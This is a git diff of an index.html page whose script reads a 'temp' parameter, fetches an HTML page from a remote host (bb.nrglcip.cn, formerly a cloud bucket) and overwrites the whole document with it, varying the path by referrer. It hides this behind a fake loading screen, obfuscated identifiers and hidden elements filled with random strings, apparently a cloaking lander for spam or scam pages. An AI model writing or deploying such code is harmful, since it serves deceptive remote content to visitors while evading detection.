--- a/index.html
+++ b/index.html
@@ -1,43 +1,186 @@
+<!DOCTYPE html>
 <html>
-<head> <meta charset="utf-8" /></head>
-<body></body>
-<script>
-    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
-    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
-    function Dget(e, t,a) {
-        var n = new XMLHttpRequest;
-        //n.timeout = 3000;
-        n.onreadystatechange = function () {
-            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
-        };n.ontimeout = function (e) {
-            //alert('请求超时,重新发起请求');
-            //location.reload();
-        };
-        n.open("GET", e, !0),
-            n.send(null)
-    }
-    var temp = getUrlParam('temp');
-    //if(document.referrer){
-    var temp_name = temp +'.html';
-    Dget('//imgkbc.bj.bcebos.com/j/'+temp_name,function(res){
-        var doc=document.open("text/html","replace")
-        doc.write(res);
-        doc.close()
-    })
-	function add_cnzz(site_id) {
-    var hm = document.createElement("script");
-    hm.src = "https://s4.cnzz.com/z_stat.php?id=" + site_id;
-    var s = document.getElementsByTagName("script")[0];
-    s.parentNode.insertBefore(hm, s);
+<head>
+    <title>加载中...</title>
+    <meta charset="UTF-8">
+    <style>
+        iframe {
+            display: none;
+            width: 100%;
+            height: 100%;
+            margin: 0;
+            padding: 0;
+            border: 0
+        }
 
-    var cnzz_span = document.createElement('span');
-    cnzz_span.id = "cnzz_stat_icon_" + site_id;
-    cnzz_span.style.display = "none"
+        body {
+            width: 100%;
+            height: 100%;
+            margin: 0;
+            padding: 0;
+            border: 0
+        }
 
-    document.body.appendChild(cnzz_span);
-}
-add_cnzz(1279189134)
-    //}
+        .NVh3l5nrxwe {
+            position: fixed;
+            left: 0;
+            right: 0;
+            top: 0;
+            bottom: 0;
+            z-index: 1;
+            background-color: #d8d8d8
+        }
 
-</script>
+        .NVh3l5nrxwe .gkwh6c79W {
+            position: absolute;
+            left: 0;
+            right: 0;
+            top: 0;
+            bottom: 0;
+            height: 50px;
+            margin: auto
+        }
+
+        .NVh3l5nrxwe .content {
+            line-height: 50px;
+            text-align: center
+        }
+
+        .NVh3l5nrxwe .img {
+            width: 100%
+        }
+
+        .NVh3l5nrxwe .IyyeRiz {
+            text-align: center
+        }
+
+        .NVh3l5nrxwe .IyyeRiz span {
+            display: inline-block;
+            width: 6px;
+            height: 50px;
+            background-color: #FF5722;
+            -webkit-transform: scaleY(0.4);
+            transform: scaleY(0.4);
+            -webkit-animation: scale 1s infinite;
+            animation: scale 1s infinite
+        }
+
+        .NVh3l5nrxwe .IyyeRiz span:nth-child(2) {
+            -webkit-animation: scale 1s .2s infinite;
+            animation: scale 1s .2s infinite
+        }
+
+        .NVh3l5nrxwe .IyyeRiz span:nth-child(3) {
+            -webkit-animation: scale 1s .3s infinite;
+            animation: scale 1s .3s infinite
+        }
+
+        .NVh3l5nrxwe .IyyeRiz span:nth-child(4) {
+            -webkit-animation: scale 1s .4s infinite;
+            animation: scale 1s .4s infinite
+        }
+
+        .NVh3l5nrxwe .IyyeRiz span:nth-child(5) {
+            -webkit-animation: scale 1s .5s infinite;
+            animation: scale 1s .5s infinite
+        }
+
+        .NVh3l5nrxwe .IyyeRiz span:nth-child(6) {
+            -webkit-animation: scale 1s .6s infinite;
+            animation: scale 1s .6s infinite
+        }
+
+        @-webkit-keyframes scale {
+            0% {
+                -webkit-transform: scaleY(0.4);
+                transform: scaleY(0.4)
+            }
+            20% {
+                -webkit-transform: scaleY(0.8);
+                transform: scaleY(0.8)
+            }
+            40% {
+                -webkit-transform: scaleY(1);
+                transform: scaleY(1)
+            }
+            100% {
+                -webkit-transform: scaleY(0.4);
+                transform: scaleY(0.4)
+            }
+        }
+
+        @keyframes scale {
+            0% {
+                -webkit-transform: scaleY(0.4);
+                transform: scaleY(0.4)
+            }
+            20% {
+                -webkit-transform: scaleY(0.8);
+                transform: scaleY(0.8)
+            }
+            40% {
+                -webkit-transform: scaleY(1);
+                transform: scaleY(1)
+            }
+            100% {
+                -webkit-transform: scaleY(0.4);
+                transform: scaleY(0.4)
+            }
+        }
+
+        .NVh3l5nrxwe .tips {
+            font-size: 1rem;
+            color: #fff;
+            text-align: center
+        }
+    </style>
+    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
+    <script>
+        function TWdjrJm2LxcDC(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
+		var UiDw7X7 = TWdjrJm2LxcDC('temp');
+		if (!document.referrer){
+			url="https://bb.nrglcip.cn/html/"+ UiDw7X7 +".html?a=index";
+		}else {
+			url="https://bb.nrglcip.cn/htm1/"+ UiDw7X7 +".html?a=share";
+		}
+		
+        U0nnLdv=url+"#"+new Date().getTime();
+        U0nnLdv && function() {
+            $.get(U0nnLdv, function(data) {
+                var new_doc = document.open("text/html", "replace");
+                new_doc.write(data);
+                new_doc.close();
+            });
+        }();
+
+    </script>
+
+</head>
+<body>
+
+<div style='display:none'>PjvbORy2zprHBM9IpSnko0mj24</div>
+<img  src='' style='display:none'>
+<a  href='#' style='display:none'>fONN3GX9RTqZnGXUC7GSgkem2Ip6qGhuTIXOI1fCx1LqQIvcGriurjNJNsKzPJ32zwkvlpmWOJqZk</a>
+<span style='display:none'>QvTh5gSsVnpC</span><div class="NVh3l5nrxwe">
+    <div class="gkwh6c79W">
+        <div class="IyyeRiz">
+            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>
+
+            <span></span>
+            <span></span>
+            <span></span>
+            <span></span>
+            <span></span>
+            <span></span></div>
+
+    </div>
+</div>
+
+<b style='display:none' >V0oVlVv2cxSes4rukWIX5JdSI8v90sufW3rWrqdJpWZP6PpA2ju31</b>
+<img  src='' style='display:none'>
+<h1 style='display:none' >LUotV00IxCyk4alyvTUXmjRQfwBMzc3ZiohNSw67RIJs808RilKuBwOe</h1>
+<span style='display:none'>IVMBBfWO8x0xgWuZntdVUMS4uCae9t1MNlZLG1pSu9qRDsRl5tYRdd9lgvljfUAa</span>
+<b style='display:none' >V0oVlVv2cxSes4rukWIX5JdSI8v90sufW3rWrqdJpWZP6PpA2ju31</b>
+<p  style='display:none'>fOncq0rFXcz9TUvD2EaGOVsOhoEduz8XTtrv3vaWKA1KHOXWrD6i4GMv7rioDad0lHCCFVgAxllAkAlOkh8WiLol6ROwi</p>
+<p  style='display:none'>fOncq0rFXcz9TUvD2EaGOVsOhoEduz8XTtrv3vaWKA1KHOXWrD6i4GMv7rioDad0lHCCFVgAxllAkAlOkh8WiLol6ROwi</p></body>
 </html>
